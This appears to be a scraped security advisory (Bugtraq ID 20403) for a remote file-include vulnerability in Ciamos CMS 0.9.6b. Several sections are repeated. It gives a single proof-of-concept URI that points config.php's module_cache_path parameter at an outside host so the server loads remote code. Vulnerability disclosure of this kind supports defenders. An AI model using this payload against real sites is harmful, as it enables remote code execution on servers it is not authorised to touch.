Ciamos CMS Config.PHP Remote File Include Vulnerability
BID:20403
Info
Ciamos CMS Config.PHP Remote File Include Vulnerability
| Bugtraq ID: | 20403 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 08 2006 12:00AM |
| Updated: | Oct 10 2006 08:09PM |
| Credit: | Kacper is credited with the discovery of this vulnerability. |
| Vulnerable: |
Ciamos Ciamos 0.9.6b |
| Not Vulnerable: | |
Discussion
Ciamos CMS Config.PHP Remote File Include Vulnerability
Ciamos CMS is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Ciamos CMS 0.9.6b and prior versions are reported affected.
Ciamos CMS is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Ciamos CMS 0.9.6b and prior versions are reported affected.
Exploit / POC
Ciamos CMS Config.PHP Remote File Include Vulnerability
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/ciamos_path/modules/forum/include/config.php?module_cache_path='http://www.example.com'
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/ciamos_path/modules/forum/include/config.php?module_cache_path='http://www.example.com'
Solution / Fix
Ciamos CMS Config.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Ciamos CMS Config.PHP Remote File Include Vulnerability
References:
References:
- Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit (Devil Team)
- Ciamos Homepage (Ciamos)